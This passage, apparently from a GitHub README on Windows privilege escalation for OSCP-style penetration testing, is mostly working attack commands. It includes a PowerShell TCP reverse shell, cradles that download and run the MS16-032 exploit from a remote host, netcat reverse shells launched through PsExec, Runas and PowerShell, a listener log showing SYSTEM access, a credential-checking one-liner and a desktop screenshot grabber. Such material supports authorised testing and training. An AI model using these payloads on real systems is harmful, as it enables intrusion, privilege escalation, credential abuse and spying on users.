-Command \"\u0026{$client = New-Object System.Net.Sockets.TCPClient(\\\"10.10.10.10\\\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + \\\"PS \\\" + (pwd).Path + \\\"^\u003e \\\";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}\"',\n\t\t\t0x00000004, $null, $GetCurrentPath,\n\t\t\t[ref]$StartupInfo, [ref]$ProcessInfo)\n```\n\nOn the remote host execute the exploit:\n```cmd\nCMD C:\\\u003e 
@\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-MS16-032.ps1'))\"\n```\nOr from a Windows PowerShell:\n```powershell\nPS C:\\\u003e IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/Invoke-MS16-032.ps1')\n```\nOr if you wanted to upload the exploit, you can always run it like this:\n```powershell\nPS C:\\\u003e powershell -ExecutionPolicy ByPass -command \"\u0026 { . C:\\Users\\Public\\Invoke-MS16-032.ps1; Invoke-MS16-032 }\"\n```\nOn our Kali machine we create the reverse shell and ... BOOM! Root dance.\n```\nroot@kali:~# nc -nlvp 4444\nlistening on [any] 4444 ...\nconnect to [10.10.10.11] from (UNKNOWN) [10.10.10.10] 49182\n\nPS C:\\Users\\jimmy^\u003e whoami\nnt authority\\system\n```\n\n## Windows Run As\nPrior to successfully performing a Windows run as, we of course need a valid Windows username and password.\nHere is a one-liner PowerShell script to verify that a username / password is valid on the local system:\n\nRequires .Net 3.5\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"\u0026{$username = '\u003cusername here\u003e'; $password = '\u003cpassword here\u003e'; $computer = $env:COMPUTERNAME; Add-Type -AssemblyName System.DirectoryServices.AccountManagement; $obj = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('machine',$computer); $obj.ValidateCredentials($username, $password); }\"\n```\nRequires .Net 2.0  \n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"\u0026{$username = '\u003cusername here\u003e'; $password = '\u003cpassword here\u003e'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object 
System.Management.Automation.PSCredential $username, $securePassword; Start-Process -FilePath C:\\Windows\\System32\\calc.exe -NoNewWindow -Credential $credential; }\"\n```\n\nSwitching users in Linux is trivial with the su command. However, an equivalent command does not exist in Windows. Here are three ways to run a command as a different user in Windows.\n\nSysinternals PsExec is a handy tool for running a command on a remote or local server as a specific user, given you have their username and password. The following example creates a reverse shell from a Windows server to our Kali box using netcat for Windows and PsExec (on a 64-bit system).\n\n```cmd\nC:\\\u003epsexec64 \\\\COMPUTERNAME -u Test -p test -h \"c:\\users\\public\\nc.exe -nc 192.168.1.10 4444 -e cmd.exe\"\nPsExec v2.2 - Execute processes remotely\nCopyright (C) 2001-2016 Mark Russinovich\nSysinternals - www.sysinternals.com\n```\n\nRunas.exe is a handy Windows tool that allows you to run a program as another user so long as you know their password. The following example creates a reverse shell from a Windows server to our Kali box using netcat for Windows and Runas.exe:\n```cmd\nC:\\\u003eC:\\Windows\\System32\\runas.exe /env /noprofile /user:Test \"c:\\users\\public\\nc.exe -nc 192.168.1.10 4444 -e cmd.exe\"\nEnter the password for Test:\nAttempting to start nc.exe as user \"COMPUTERNAME\\Test\" ...\n```\n\nPowerShell can also be used to launch a process as another user. 
The following simple PowerShell script will run a reverse shell as the specified username and password.\n```powershell\n$username = '\u003cusername here\u003e'\n$password = '\u003cpassword here\u003e'\n$securePassword = ConvertTo-SecureString $password -AsPlainText -Force\n$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword\nStart-Process -FilePath C:\\Users\\Public\\nc.exe -NoNewWindow -Credential $credential -ArgumentList (\"-nc\",\"192.168.1.10\",\"4444\",\"-e\",\"cmd.exe\") -WorkingDirectory C:\\Users\\Public\n```\nNext, run this script using powershell.exe:\n```cmd\nCMD C:\\\u003e powershell -ExecutionPolicy ByPass -command \"\u0026 { . C:\\Users\\public\\PowerShellRunAs.ps1; }\"\n```\n\n# Other files\nHere are a few other handy scripts and things...\n\n## Capture a screenshot\nThe following PowerShell commands can be used to capture a screenshot of the remote computer's desktop and store it as a BMP file.\n```powershell\nAdd-Type -AssemblyName System.Windows.Forms\nAdd-Type -AssemblyName System.Drawing\n$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen\n$bitmap = New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height\n$graphic = [System.Drawing.Graphics]::FromImage($bitmap)\n$graphic.CopyFromScreen($Screen.Left, $Screen.Top, 0, 0, $bitmap.Size)\n$bitmap.Save('screen1.bmp')\n```\nIf you are on CMD, you can use this handy one-liner to execute the same PowerShell command:\n```cmd\n@\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bitmap = New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height; $graphic = [System.Drawing.Graphics]::FromImage($bitmap); $graphic.CopyFromScreen($Screen.Left, $Screen.Top, 0, 0, $bitmap.Size); 
$bitmap.Save('screen1.bmp')\"\n```\n\n**CopyAndPasteFileDownloader.bat**\n\nWindows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic Windows reverse shell and used to transfer files from a web server (the timeout 1 commands are required after each new line).\n\n**CopyAndPasteEnum.bat**\n\nNo-file-upload-required Windows privilege escalation basic information gathering (based on the FuzzySecurity tutorial).\nCopy and paste the following contents into your remote Windows shell in Kali to generate a quick report.\n\n**enumeration.md**\n\nBasic notes on Windows enumeration from the OSCP.\n\n**windows_recon.bat**\n\nAn uploadable batch file for performing basic Windows enumeration.\n\n\n**References**  \nhttps://medium.com/@hakluke  \nhttps://daya.blog/2018/01/06/windows-privilege-escalation/  \nhttps://pentestlab.blog/2017/04/19/stored-credentials/  \nhttps://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/  \nhttps://www.abatchy.com/  \nhttps://gist.github.com/egre55  \nhttps://github.com/egre55/ultimate-file-transfer-list  \nhttps://lolbas-project.github.io/  \nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/  \nhttps://github.com/GhostPack/Seatbelt  \nhttps://github.com/rasta-mouse/Watson  \nhttp://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html  \nhttps://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb  \n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffrizb%2Fwindows-privilege-escalation","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffrizb%2Fwindows-privilege-escalation","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffrizb%2Fwindows-privilege-escalation/lists"}